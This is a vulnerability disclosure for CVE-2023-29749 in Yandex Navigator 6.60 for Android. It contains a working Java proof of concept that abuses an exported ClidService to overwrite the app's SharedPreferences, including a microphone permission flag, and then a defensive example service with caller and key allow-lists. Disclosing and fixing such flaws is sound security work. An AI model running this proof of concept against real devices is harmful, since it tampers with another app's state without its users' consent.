CVE-2023-29749: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs
An issue found in Yandex Navigator v.6.60 for Android allows unauthorized apps to cause escalation of privilege attacks by manipulating the SharedPreference files.
Escalation of Privileges exists in Yandex Navigator (CVE-2023-29749)
Vendor: Yandex (https://yandex.com/)
Affected product: Yandex Navigator (ru.yandex.yandexnavi)
Version: 6.60
Download link: https://play.google.com/store/apps/details?id=ru.yandex.yandexnavi&pli=1
Description of the vulnerability for use in the CVE: An issue found in Yandex Navigator v.6.60 allows unauthorized apps to cause escalation of privilege attacks by manipulating the SharedPreference files.
Additional information: The Yandex Navigator application allows unauthorized applications to modify the data in its SharedPreference files, which are loaded into memory at application startup, thus affecting the behaviour of certain features of the application. For example, an attacker can modify the "notification-enabled" value in the ru.yandex.yandexnavi.preferences.xml file through the interface provided by the exposed components of the Yandex Navigator application. This turns off the search box in the application's notification bar, affecting the normal functionality of the application and constituting an escalation of privilege attack. In fact, an attacker can insert data into any SharedPreferences file whose name starts with 'ru.yandex.yandexnavi.', such as 'ru.yandex.yandexnavi.ui.PermissionDelegateImpl.PREFERENCES'. I found that there are many SharedPreferences files of this kind, and they store a lot of important data.
PoC:

```java
import android.content.ComponentName;
import android.content.Context;
import android.content.Intent;
import android.content.ServiceConnection;
import android.os.Bundle;
import android.os.IBinder;

// Runs inside an Activity or Service of the calling app (a Context is needed for bindService).
public void attack_ru() {
    // Exported service of Yandex Navigator that applies preference updates
    ComponentName componentName = new ComponentName("ru.yandex.yandexnavi", "ru.yandex.common.clid.ClidService");
    Intent intent = new Intent();
    intent.setComponent(componentName);
    intent.putExtra("service_version", 0);
    intent.setAction("ru.yandex.common.clid.update_preferences");
    // Target file: ru.yandex.yandexnavi.ui.PermissionDelegateImpl.PREFERENCES
    intent.putExtra("preferences", "ui.PermissionDelegateImpl.PREFERENCES");
    intent.putExtra("application", "ru.yandex.yandexnavi");

    Bundle bundle = new Bundle();
    Bundle bundle2 = new Bundle(); // values to write
    Bundle bundle3 = new Bundle(); // timestamp for each value
    bundle2.putBoolean("MICROPHONE", false);
    long time = 1657202353619L;
    bundle3.putLong("MICROPHONE", time);
    bundle.putBundle("bundle-values", bundle2);
    bundle.putBundle("bundle-time", bundle3);
    intent.putExtra("bundle", bundle);

    ServiceConnection connection = new ServiceConnection() {
        @Override
        public void onServiceConnected(ComponentName name, IBinder service) { }

        @Override
        public void onServiceDisconnected(ComponentName name) { }
    };
    bindService(intent, connection, Context.BIND_AUTO_CREATE);
}
```
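The root cause described above is an exported service that applies preference updates carried in the binding Intent, which gives the service no verifiable caller identity. The following is an added example of a hardened service (not Yandex's code, and not a fix taken from the vendor): it ignores Intent extras, receives updates over a Messenger so that `Message.sendingUid` identifies the caller, allow-lists both the calling package and the preference files and keys it is willing to touch. The package name `com.example.hardened`, the class `SafePreferenceService`, and the allow-list contents are assumptions.

```java
package com.example.hardened; // hypothetical package, not the vendor's

import android.app.Service;
import android.content.Intent;
import android.content.SharedPreferences;
import android.os.Bundle;
import android.os.Handler;
import android.os.IBinder;
import android.os.Looper;
import android.os.Message;
import android.os.Messenger;
import android.os.Process;
import android.util.Log;

import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;

public class SafePreferenceService extends Service {
    private static final String TAG = "SafePreferenceService";
    static final int MSG_UPDATE_PREFERENCES = 1;

    // Assumed allow-lists: only the app's own package may write, and only these
    // files and keys are writable through this entry point.
    private static final Set<String> ALLOWED_CALLERS =
            new HashSet<>(Arrays.asList("com.example.hardened"));
    private static final Set<String> ALLOWED_FILES =
            new HashSet<>(Arrays.asList("com.example.hardened.preferences"));
    private static final Set<String> ALLOWED_KEYS =
            new HashSet<>(Arrays.asList("notification-enabled"));

    // Messages arrive with sendingUid filled in by the system (API 21+), so the
    // caller can be identified, unlike extras on the binding Intent.
    private final Messenger messenger = new Messenger(new Handler(Looper.getMainLooper()) {
        @Override
        public void handleMessage(Message msg) {
            if (msg.what != MSG_UPDATE_PREFERENCES) {
                return;
            }
            if (!isTrustedCaller(msg.sendingUid)) {
                Log.w(TAG, "rejected preference update from uid " + msg.sendingUid);
                return;
            }
            applyUpdate(msg.getData());
        }
    });

    @Override
    public IBinder onBind(Intent intent) {
        // Deliberately ignore every extra on the binding Intent: nothing in it
        // can be attributed to a caller, so it must never drive state changes.
        return messenger.getBinder();
    }

    // A caller is trusted only if it is this process or one of the allow-listed packages.
    boolean isTrustedCaller(int uid) {
        if (uid == Process.myUid()) {
            return true;
        }
        String[] packages = getPackageManager().getPackagesForUid(uid);
        if (packages == null) {
            return false;
        }
        for (String pkg : packages) {
            if (ALLOWED_CALLERS.contains(pkg)) {
                return true;
            }
        }
        return false;
    }

    // Writes only allow-listed keys into an allow-listed file; everything else is dropped.
    void applyUpdate(Bundle data) {
        String file = data.getString("preferences");
        Bundle values = data.getBundle("bundle-values");
        if (file == null || values == null || !ALLOWED_FILES.contains(file)) {
            Log.w(TAG, "rejected update for preference file " + file);
            return;
        }
        SharedPreferences.Editor editor = getSharedPreferences(file, MODE_PRIVATE).edit();
        for (String key : values.keySet()) {
            if (!ALLOWED_KEYS.contains(key)) {
                Log.w(TAG, "dropped non-allow-listed key " + key);
                continue;
            }
            Object value = values.get(key);
            if (value instanceof Boolean) {
                editor.putBoolean(key, (Boolean) value);
            } else if (value instanceof String) {
                editor.putString(key, (String) value);
            } else if (value instanceof Long) {
                editor.putLong(key, (Long) value);
            }
        }
        editor.apply();
    }
}
```

The caller check is defence in depth; the primary fix is in the manifest, where the service should be declared with `android:exported="false"`, or, if other apps from the same signer must reach it, guarded with an `android:permission` whose `protectionLevel` is `signature`. On Android 11 and later, `getPackagesForUid` is subject to package visibility rules, so the allow-listed packages must be declared in a `<queries>` element for the lookup to succeed.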